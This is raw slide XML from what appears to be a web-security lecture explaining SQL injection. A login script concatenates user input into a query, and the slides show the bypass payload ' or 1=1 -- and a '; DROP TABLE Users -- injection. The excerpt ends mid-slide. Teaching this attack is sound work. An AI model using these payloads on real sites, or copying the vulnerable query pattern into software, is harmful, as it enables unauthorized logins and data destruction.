                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>" ' </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>   AND   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>=' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>&amp; form(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”) &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>not ok.EOF   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>		login success  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>else  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>fail;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>this exploitable?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49"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111500"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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1836738"/>
            <a:ext cx="139541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Browser</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>(Client)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22533" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7412037"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sz="2200" b="1"/>
              <a:t>DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22534" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1833563" y="3016250"/>
            <a:ext cx="1298575" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22535" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1866900" y="4025900"/>
            <a:ext cx="1181100" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22536" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1812925" y="1811338"/>
            <a:ext cx="1341438" cy="1190625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Enter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22537" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4386263" y="1981200"/>
            <a:ext cx="3025774" cy="1528624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>user='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92172" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2847975" y="4525963"/>
            <a:ext cx="3052763" cy="579437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Normal Query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4386263" y="3449817"/>
            <a:ext cx="3025774"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0800000">
            <a:off x="4386264" y="3808412"/>
            <a:ext cx="3059111"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3200400"/>
            <a:ext cx="24384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847A6432-2AF4-4D50-9537-3B972F0DB613}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1304578" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bad input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1304579" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447800"/>
            <a:ext cx="8305800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suppose    user = </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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(URL encoded)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Then scripts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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>or 1=1  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> … )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  causes rest of line to be ignored.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Now  ok.EOF   is always </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>false and login succeeds.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The bad news:    easy login to many sites this way.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0" y="3996906"/>
            <a:ext cx="41148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05D07F75-139E-4502-A23C-6822D349B884}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1305602" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Even worse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1305603" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1524000"/>
            <a:ext cx="8610600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suppose user = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>“</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  DROP TABLE  Users  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Then script does:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WHERE user=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DROP TABLE Users  …</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
